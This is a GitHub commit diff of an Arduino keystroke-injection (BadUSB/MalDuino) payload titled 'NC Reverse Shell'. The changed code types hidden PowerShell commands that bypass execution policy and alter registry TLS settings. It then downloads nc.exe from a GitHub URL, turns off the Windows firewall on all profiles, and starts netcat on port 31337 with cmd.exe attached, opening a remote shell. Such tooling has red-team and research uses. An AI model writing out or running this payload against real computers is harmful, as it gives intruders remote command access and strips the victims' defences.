Skip to content

Commit 5fcc97d

Browse files
pcmarconpcmarcon
authored
Update malduino_generic_nc_reverse_shell.ino
1 parent 5b7677d commit 5fcc97d

File tree

1 file changed

+12
-21
lines changed

1 file changed

+12
-21
lines changed

malduino_generic_nc_reverse_shell.ino

+12-21
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
/*
2-
Single File Encryption Payload for GENERIC USB ATMEGA32U4 hw
2+
NC Reverse Shell Payload for GENERIC USB ATMEGA32U4 hw
33
Copyright (c) 2021, Paulo C. Marcon (Licensed under MIT)
44
For more information see: https://github.com/pcmarcon/malduino-payload-sample
55
*/
@@ -174,7 +174,7 @@ void setup() {
174174
typeKey(KEY_RETURN);
175175

176176
delay(defaultDelay);
177-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -Force}");
177+
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -Force}");
178178

179179
delay(defaultDelay);
180180
delay(100);
@@ -183,7 +183,7 @@ void setup() {
183183
typeKey(KEY_RETURN);
184184

185185
delay(defaultDelay);
186-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
186+
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
187187

188188
delay(defaultDelay);
189189
delay(100);
@@ -192,7 +192,7 @@ void setup() {
192192
typeKey(KEY_RETURN);
193193

194194
delay(defaultDelay);
195-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
195+
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
196196

197197
delay(defaultDelay);
198198
delay(100);
@@ -201,7 +201,7 @@ void setup() {
201201
typeKey(KEY_RETURN);
202202

203203
delay(defaultDelay);
204-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Client' -Force}");
204+
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Client' -Force}");
205205

206206
delay(defaultDelay);
207207
delay(100);
@@ -210,7 +210,7 @@ void setup() {
210210
typeKey(KEY_RETURN);
211211

212212
delay(defaultDelay);
213-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
213+
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}");
214214

215215
delay(defaultDelay);
216216
delay(100);
@@ -219,7 +219,7 @@ void setup() {
219219
typeKey(KEY_RETURN);
220220

221221
delay(defaultDelay);
222-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
222+
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')\"");
223223

224224
delay(defaultDelay);
225225
delay(100);
@@ -228,16 +228,10 @@ void setup() {
228228
typeKey(KEY_RETURN);
229229

230230
delay(defaultDelay);
231-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {reg add HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}");
232-
233-
delay(defaultDelay);
234-
delay(100);
235-
236-
delay(defaultDelay);
237-
typeKey(KEY_RETURN);
231+
delay(2000);
238232

239233
delay(defaultDelay);
240-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile \"(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')\"");
234+
Keyboard.print("netsh advfirewall set allprofiles state off");
241235

242236
delay(defaultDelay);
243237
delay(100);
@@ -246,10 +240,7 @@ void setup() {
246240
typeKey(KEY_RETURN);
247241

248242
delay(defaultDelay);
249-
delay(2000);
250-
251-
delay(defaultDelay);
252-
Keyboard.print("netsh advfirewall set allprofiles state off");
243+
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"%temp%\\nc.exe -Lp 31337 -vv -e cmd.exe\"");
253244

254245
delay(defaultDelay);
255246
delay(100);
@@ -258,14 +249,14 @@ void setup() {
258249
typeKey(KEY_RETURN);
259250

260251
delay(defaultDelay);
261-
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"%temp%\\nc.exe -Lp 31337 -vv -e cmd.exe\"");
252+
Keyboard.print("exit");
262253

263254
delay(defaultDelay);
264255
delay(100);
265256

266257
delay(defaultDelay);
267258
typeKey(KEY_RETURN);
268-
259+
269260
/* ----- End-Payload -----*/
270261

271262
Keyboard.end();

0 commit comments

Comments
 (0)